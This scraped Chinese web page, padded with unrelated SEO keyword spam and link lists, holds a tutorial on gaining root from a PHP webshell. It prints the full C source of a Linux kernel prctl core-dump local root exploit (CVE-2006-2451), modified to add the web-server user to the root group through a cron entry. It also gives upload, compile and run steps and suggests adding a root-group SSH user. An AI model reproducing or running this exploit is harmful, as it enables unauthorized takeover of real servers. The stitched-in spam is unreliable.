当前位置: 首页 > news >正文

500m主机空间能做视频网站吗如何建立微网站详细

500m主机空间能做视频网站吗,如何建立微网站详细,免费发布信息的网站平台,今天的新闻内容摘抄30字用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提#xff1a;1、目标机上安装了GCC能编译源码2、Kernel 2.6.x ( 2.6.13 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所…用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提1、目标机上安装了GCC能编译源码2、Kernel 2.6.x         ( 2.6.13 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行HTTP进程的用户加入到ROOT组(红色显示),让WEBSHELL有ROOT权限./**********溢出代码**************************//* Local r00t Exploit for:                                 *//* Linux Kernel PRCTL Core Dump Handling                   *//* ( BID 18874 / CVE-2006-2451 )                           *//* Kernel 2.6.x        ( 2.6.13 2.6.17.4)                 *//* By:                                                     *//* - dreyer                   (main PoC code)         *//* - RoMaNSoFt (local root code) *//*                                        [ 10.Jul.2006 ]        *//*****************************************************/#include #include #include #include #include #include #include #include char *payload\nSHELL/bin/sh\nPATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *         root         cp /bin/sh /tmp/sh ;gpasswd -a wwwrun root ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n;int main() {int child;struct rlimit corelimit;printf(Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n);printf(By: dreyer RoMaNSoFt\n);printf([ 10.Jul.2006 ]\n\n);corelimit.rlim_cur RLIM_INFINITY;corelimit.rlim_max RLIM_INFINITY;setrlimit(RLIMIT_CORE, corelimit);printf([*] Creating Cron entry\n);if ( !( child fork() )) {chdir(/etc/cron.d);prctl(PR_SET_DUMPABLE, 2);sleep(200);exit(1);}kill(child, SIGSEGV);printf([*] Sleeping for aprox. one minute (** please wait **)\n);sleep(62);printf([*] Running shell (remember to remove /tmp/sh when finished) ...\n);system(/tmp/sh -p);}把上面的代码保存为tmp.c,上传到目标主机/tmp目录下,接着PHPSHELL里编译gcc -o tmp tmp.c ,然后执行./tmp(有时候需要执行几次才能成功).用whoami命令看下你会发现你的WEBSHELL权限是ROOT.char *payload 后面的命令都是以ROOT执行的,如果开放了SSH并且没做登陆限制,可以直接到那添加一个用户并加入到ROOT组,自己发挥~~~~~
http://www.yutouwan.com/news/174656/

相关文章:

  • 干网站建设销售怎么样个人网站作品下载
  • 高端网站模板哈尔滨制作企业网站
  • 网站制作学费多少钱网站优化seo教程
  • 怎么在网站注册账号wap网页设计模板
  • 做网站前需要准备什么软件架设仿冒网站挂马
  • 购物网站排名2018wordpress怎么装插件
  • 个体户做盈利网站成都青羊建设厅官方网站
  • 建网站系统青岛网站建设市场
  • 小型公司建网站yw最新域名备案查询
  • 刚做的网站 为啥搜不到零代码平台
  • 用四字成语做网站域名好吗成都发布最新消息
  • 制作一个网站流程wordpress服务器出错
  • 网站建设需要步骤营销型网站制作价格
  • 网站个性化设计山西制作网站
  • h5页面网站模板用科讯cms做网站的步骤
  • 做宠物商品的网站网站制作公司网站建设公司
  • 深圳网站优化哪家好怎么搭建app
  • 网站开发毕业设计说明书范文品牌推广方案范文
  • nanopi neo做网站网站数据库怎么配置
  • 自贡网站开发杭州最好的工业设计公司
  • 网站友情链接检测使用dw设计个人简历网页模板
  • 国外网站如何做推广个人建设网站需要什么证件吗
  • 泰州网站建设优化网站怎么备案在哪里
  • 东莞网站制作公司是什么好听好记的域名
  • net大规模网站开发视频网页和网站区别
  • 已备案网站更换域名重庆网站推广什么
  • 河北省住房城乡建设局网站网站建设需求调研计划表
  • 如何做免费的网站微信小程序上线流程
  • wordpress制作官方网站网站建设怎么收费
  • 网站制作包括数据库吗免费学高中课程的软件